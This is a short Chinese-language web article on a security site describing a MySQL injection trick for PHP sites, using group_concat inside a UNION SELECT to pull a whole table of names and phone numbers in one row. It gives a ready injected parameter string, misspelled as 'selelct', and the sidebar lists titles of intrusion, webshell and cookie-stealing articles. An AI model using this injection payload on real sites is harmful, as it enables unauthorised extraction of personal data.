首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
php mysql注入的一种快速有效union方法select出数据库内容
来源:http://hi.baidu.com/it_security/blog 作者:it_security 发布时间:2012-03-23  

php sql injector的时候,很多情况下都是显示一行一行的数据,要一次得到全部数据或者表格,那就的重复多次。

函数group_concat可以实现将表格放入一个单元格中(即仅有一行一列)

例如:

select group_concat(id,0x7c,name,0x7c,tel,0x5d) from  g

那么将得到:

1|张三|83023023],|李四|13893232322],.....

(注意上面查询结果不是一行多列,而是一行一列)

假设原来的sql注入地方为:

select name from userinfo where id=$id

那么可以这样构造:

id=1 and 1=2 union selelct group_concat(id,0x7c,name,0x7c,tel,0x5d) from  g


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Metasploit BackDoor For Window
·Web文件操作脆弱性-----下载文件
·Metasploit pSnuffle Packet Sni
·metasploit的pivot实例详解
·Metasploit 权限提升
·检测某贵族学校
·记一次成功入侵某公司内网
·实例渗透某台湾大学全纪录
·白给你的shell(搜索引擎)
·28度的冰注入技巧(404页面妙用,s
·简单实现webshell root
·专业渗透人员在渗透过程中一定要
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved